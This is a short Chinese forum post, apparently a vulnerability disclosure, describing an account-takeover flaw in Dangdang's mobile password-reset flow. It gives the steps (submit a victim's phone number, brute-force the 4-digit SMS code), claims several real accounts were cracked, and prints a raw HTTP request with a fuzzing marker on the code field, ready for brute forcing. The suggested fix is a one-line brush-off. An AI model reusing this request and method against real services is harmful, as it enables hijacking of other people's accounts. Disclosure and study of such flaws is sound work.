goback add

当当网任意用户密码修改漏洞

3992 点击·0 回帖
灯火互联
灯火互联
楼主
ttp://m.dangdang.com/forget_psd.php?sid=e14aa9b65e0f4d05
输入要更新帐号的手机号码,然后提交。
下一步,对验证码进行暴破,由于验证码只4位。。网速乐观的情况下,数分钟就能破解出来。

也不多说了,经测试,成功破解了数个帐号。


POST /verify_fp.php?sid=e88bf0a11d2e7920 HTTP/1.1
Host: m.dangdang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://m.dangdang.com/verify_fp.php?sid=e88bf0a11d2e7920
Content-Type: application/x-www-form-urlencoded

action=verify;sid=e88bf0a11d2e7920;mobile=xxxx;verify=§v§;submit=%E6%8F%90%E4%BA%A4

图片:20121022103647348.jpg



修复方案:
你比我更懂!

喜欢0 评分0
回复

切换至电脑版

Powered by phpwind.me ©2003-2014